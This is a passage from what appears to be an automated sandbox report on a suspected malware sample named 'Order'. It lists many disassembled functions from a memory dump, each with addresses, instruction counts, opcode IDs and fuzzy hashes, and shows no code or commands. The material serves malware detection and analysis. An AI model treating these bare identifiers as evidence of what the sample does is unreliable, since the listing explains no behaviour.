                                                                                                                                    • Instruction ID: dadec67b3b6397616a40e4a689fa1a6e1fbe67ab136d146b781d9ea884188686
                                                                                                                                    • Opcode Fuzzy Hash: aa14407a0246cf8b5d3c8f150281784d2e5a9d6ff1374dd6fb10e8d0a8dc54a4
                                                                                                                                    • Instruction Fuzzy Hash: 91E09232100954ABC322FF29DD01F8A779AEFA07A0F014525B11957190CB30A910C794
                                                                                                                                    Function 019FA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                    • Instruction ID: d534047f53909892689ea7c0ecd7267fbd7dd5bda39311f21aa92724f60bce0e
                                                                                                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                    • Instruction Fuzzy Hash: C2E09231010612EFE732AF2AC808B56BBE9BF90B52F148C2CA19E124B0C77598C0CB40
                                                                                                                                    Function 019C4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                    • Instruction ID: 684c45d67c3278a8a5dcc4f6e507938b3eed5c9a550809257d868e91208f2266
                                                                                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                    • Instruction Fuzzy Hash: 9FE0C2343403058FE715CF19C050B627BBABFD5A11F28C068A9888F205EB32E842CB41
                                                                                                                                    Function 0193823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                    • Instruction ID: 7750171b6987012134c246e5ddbc1591549ebe9c15152f391ff3a917697de007
                                                                                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                    • Instruction Fuzzy Hash: 79E08C32401A10EFDB322F29DC00F5276A9FBD4B91F214A29F08E160A886B4A881CB44
                                                                                                                                    Function 01942050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
                                                                                                                                    • Instruction ID: 4412125d242d7258e0563a33f9879c05976f111714f25606e50971e243ce10b6
                                                                                                                                    • Opcode Fuzzy Hash: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
                                                                                                                                    • Instruction Fuzzy Hash: 42E0C2321004506BC312FF5DED01F4A739EEFE47A0F000121F55897290CB20AD01C7A4
                                                                                                                                    Function 01978A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                    • Instruction ID: 8c45d3227d1bf5c642bb44b77d67973f24cc90153364efb0f3cd81086e84dbc9
                                                                                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                    • Instruction Fuzzy Hash: 18E08633511A1487C728EE18D515B7277A8EF45720F09463EA61747780C534E544C794
                                                                                                                                    Function 01996AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                    • Instruction ID: cb3ad914b1a6d0f5e207b902aa7728c77dd0ac88528d756acfe527aab5a53430
                                                                                                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                    • Instruction Fuzzy Hash: 5BD05E36511A50AFC7329F1BEA00C13BBF9FBC5B51705062EA94983920C675A806CBA0
                                                                                                                                    Function 0197E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                    • Instruction ID: f9db0526eb8926f968e882347c88b930fbd02ebd635b0b9b014d0ad764d3543d
                                                                                                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                    • Instruction Fuzzy Hash: AED0A932A24620ABDB72AA1CFC00FC333E8BB88761F060459B508C7150C360AC81CA84
                                                                                                                                    Function 019BE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                    • Instruction ID: c728f72d492782976e92a71c07e9f42f845facc783841515fbaac5d795ef5dd1
                                                                                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                    • Instruction Fuzzy Hash: 09E0EC359506849BDF56DF99C680F9ABBB9FB94B40F150054A50C6B660C624A900CB40
                                                                                                                                    Function 0193A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                    • Instruction ID: a4395eca186dcfcdb02681973f7e5a5c1c35abecee95c5607ea0550c59f9c09c
                                                                                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                    • Instruction Fuzzy Hash: 3AD0223222603093CB289695A800F63AA09EBC1AD0F0A002C380EE3800C0048C42C2E0
                                                                                                                                    Function 0197A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                    • Instruction ID: 302f54043d78046d8abbcc0980d31e0e20f78a7cc38966ca9130932ee5db6d07
                                                                                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                    • Instruction Fuzzy Hash: F6D012371E054DBBCB11DF66DC01F957BA9E7A4BA0F444020B908875A0C63AE950D684
                                                                                                                                    Function 0197CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
                                                                                                                                    • Instruction ID: 2c5a947b068a194748fdc8da4be9989c03f3b8ce43442a9cf28a2c9716b8f246
                                                                                                                                    • Opcode Fuzzy Hash: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
                                                                                                                                    • Instruction Fuzzy Hash: E1D0A734515402DBDF1FEF08CA50E6E3F79FF14A82B40006CEB0851020E328DD01C710
                                                                                                                                    Function 019502A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                    • Instruction ID: 5e4d49e1d32f10e8ee0f6ebf078602efb0083fcbe66ed794212c16eaed937bc8
                                                                                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                    • Instruction Fuzzy Hash: 1FD0C935612E80CFD76BCB0CC5A4F1573B8BB44B85FC90890F809CBB22D66CD944CA40
                                                                                                                                    Function 0197C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                    • Instruction ID: 885398c4010adaa390e4779d68ce2139ed00fb43aa47458574604fdbac6bf410
                                                                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                    • Instruction Fuzzy Hash: 9BC01232150644AFC711DA95CD01F0177A9E798B40F000021F60447570C531E910D644
                                                                                                                                    Function 01960310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                    • Instruction ID: 882bee54450451e8c3068ae5d15c2fe433ee967b5a5393c6260ad1192a8df49c
                                                                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                    • Instruction Fuzzy Hash: 37D01236100289EFCB05DF41C890D9A772AFBD8710F148019FD19076108A31ED62DA50
                                                                                                                                    Function 01940750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                    • Instruction ID: 9da913adf343b8a1c8835a8e70ed330772716711c340ab11fcb84695f77e594b
                                                                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                    • Instruction Fuzzy Hash: 5EC04C757015418FCF15DB1ED294F5577F4F744741F150890E849DB721E624E901CA10
                                                                                                                                    Function 01984340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4ddbdb021037fff1f2c60af7fa68926c86803bd5d82f5966653552a170f73183
                                                                                                                                    • Instruction ID: 15c7acd5b11d570d21730cb526b25bf147317087646aa8a304196ea5d89f5723
                                                                                                                                    • Opcode Fuzzy Hash: 4ddbdb021037fff1f2c60af7fa68926c86803bd5d82f5966653552a170f73183
                                                                                                                                    • Instruction Fuzzy Hash: BE900231606904129640715C48885468049A7E1301B55C015E0468554CCA198A565365
                                                                                                                                    Function 01984650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 695ebc08d1c8f86545aff07bb7c1eb0880e49a7cfadf4e1d1ea0cc72cc4cf066
                                                                                                                                    • Instruction ID: e6676f752524245afa074b5e2ad41222c63855ef8001d826f743b435feedeb88
                                                                                                                                    • Opcode Fuzzy Hash: 695ebc08d1c8f86545aff07bb7c1eb0880e49a7cfadf4e1d1ea0cc72cc4cf066
                                                                                                                                    • Instruction Fuzzy Hash: 16900261602604424640715C4808406A049A7E2301395C119A0598560CC61D8955936D
                                                                                                                                    Function 01982B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d96483a707303aef3b2e71256be1dd7cc35acda7b3c3a606225cf03e33b9c027
                                                                                                                                    • Instruction ID: 0169064238cb9647f414b8e03a633741f2e991849ef0932ea8c95676e91afac7
                                                                                                                                    • Opcode Fuzzy Hash: d96483a707303aef3b2e71256be1dd7cc35acda7b3c3a606225cf03e33b9c027
                                                                                                                                    • Instruction Fuzzy Hash: 1690023120250C02D604715C4808686404997D1301F55C015A6068655ED66A89917235
                                                                                                                                    Function 01982BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fffb52025e7653f283f9d1cee3a0a2d1a44176f16cab8b662503c2e0948db5f0
                                                                                                                                    • Instruction ID: 173327538a0634fc9105b13cd2c96b1f99a6d4ee75db0bf738a41889455fbe50
                                                                                                                                    • Opcode Fuzzy Hash: fffb52025e7653f283f9d1cee3a0a2d1a44176f16cab8b662503c2e0948db5f0
                                                                                                                                    • Instruction Fuzzy Hash: 3390023160650C02D650715C4418746404997D1301F55C015A0068654DC75A8B5577A5
                                                                                                                                    Function 01982BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cb6eb0cd2d4c7c21fb9f76e72d20f46b5ddb28255b046133fab3c58728bb6026
                                                                                                                                    • Instruction ID: 1419f28ccbf0100097e0335b88da76228feee71edd06940f15515562471adea6
                                                                                                                                    • Opcode Fuzzy Hash: cb6eb0cd2d4c7c21fb9f76e72d20f46b5ddb28255b046133fab3c58728bb6026
                                                                                                                                    • Instruction Fuzzy Hash: 6E90023120250C02D680715C440864A404997D2301F95C019A0069654DCA1A8B5977A5
                                                                                                                                    Function 01982BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 145335202b7644b2a359fee8c20a83a8a0ead51d7f3e19eeac8537f5dc04c165
                                                                                                                                    • Instruction ID: 0d111851fa7defb2a97189bc28d3caf752fb00978e9f8c7af448f26eb5892192
                                                                                                                                    • Opcode Fuzzy Hash: 145335202b7644b2a359fee8c20a83a8a0ead51d7f3e19eeac8537f5dc04c165
                                                                                                                                    • Instruction Fuzzy Hash: 1890023120654C42D640715C4408A46405997D1305F55C015A00A8694DD62A8E55B765
                                                                                                                                    Function 01982AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c3603e315a3efe61741351360e28b42f59770493122479cbccf746ff1bc8752
                                                                                                                                    • Instruction ID: 3457a98bafde07c091218c243709e8452e9c68136044e78399e2d2eeca1d8db0
                                                                                                                                    • Opcode Fuzzy Hash: 7c3603e315a3efe61741351360e28b42f59770493122479cbccf746ff1bc8752
                                                                                                                                    • Instruction Fuzzy Hash: 8D9002A1202644924A00B25C8408B0A854997E1201B55C01AE1098560CC52A89519239
                                                                                                                                    Function 01982AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6b80217fd712f9756393a85653a4f55b4adf13546f63082962f0d27da9a967dc
                                                                                                                                    • Instruction ID: 0192c98f9a5761d19a16dd8771b7ce85b645779d660877fbb82bdc08eddf560e
                                                                                                                                    • Opcode Fuzzy Hash: 6b80217fd712f9756393a85653a4f55b4adf13546f63082962f0d27da9a967dc
                                                                                                                                    • Instruction Fuzzy Hash: 05900225212504030605B55C0708507408A97D6351355C025F1059550CD62689615225
                                                                                                                                    Function 01982AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
                                                                                                                                    • Instruction ID: e2d5a1a6a13c2f335221cde8566fb97f36db5d0d00211575453c563934e37fc5
                                                                                                                                    • Opcode Fuzzy Hash: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
                                                                                                                                    • Instruction Fuzzy Hash: 9E900225222504020645B55C060850B4489A7D7351395C019F145A590CC62689655325
                                                                                                                                    Function 01982DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
                                                                                                                                    • Instruction ID: 21c6acc9ac5f16c626464969d4fbeea964de491e45d24198618eda2edfe7ec4a
                                                                                                                                    • Opcode Fuzzy Hash: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
                                                                                                                                    • Instruction Fuzzy Hash: 8C90023124250802D641715C4408606404DA7D1241F95C016A0468554EC65A8B56AB65
                                                                                                                                    Function 01982DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
                                                                                                                                    • Instruction ID: 58d03e9c751a5d37823052b02246a3a833ffbf8a1a21f8b62a3abf943e281b4a
                                                                                                                                    • Opcode Fuzzy Hash: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
                                                                                                                                    • Instruction Fuzzy Hash: 8D900221243545525A45B15C4408507804AA7E1241795C016A1458950CC52B9956D725
                                                                                                                                    Function 01982D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
                                                                                                                                    • Instruction ID: 1f839154bd7e5149d5ef44955bf594d2bc03a9e345e42147b5bce28a8ba189d7
                                                                                                                                    • Opcode Fuzzy Hash: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
                                                                                                                                    • Instruction Fuzzy Hash: 2090022921350402D680715C540C60A404997D2202F95D419A0059558CC91A89695325
                                                                                                                                    Function 01982D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
                                                                                                                                    • Instruction ID: 496ba9f708576c881c20d3fae045fbb1ea0ef6adaf4138e04b8d6460f18f5096
                                                                                                                                    • Opcode Fuzzy Hash: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
                                                                                                                                    • Instruction Fuzzy Hash: 8490022120654842D600755C540CA06404997D1205F55D015A10A8595DC63A8951A235
                                                                                                                                    Function 01982D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
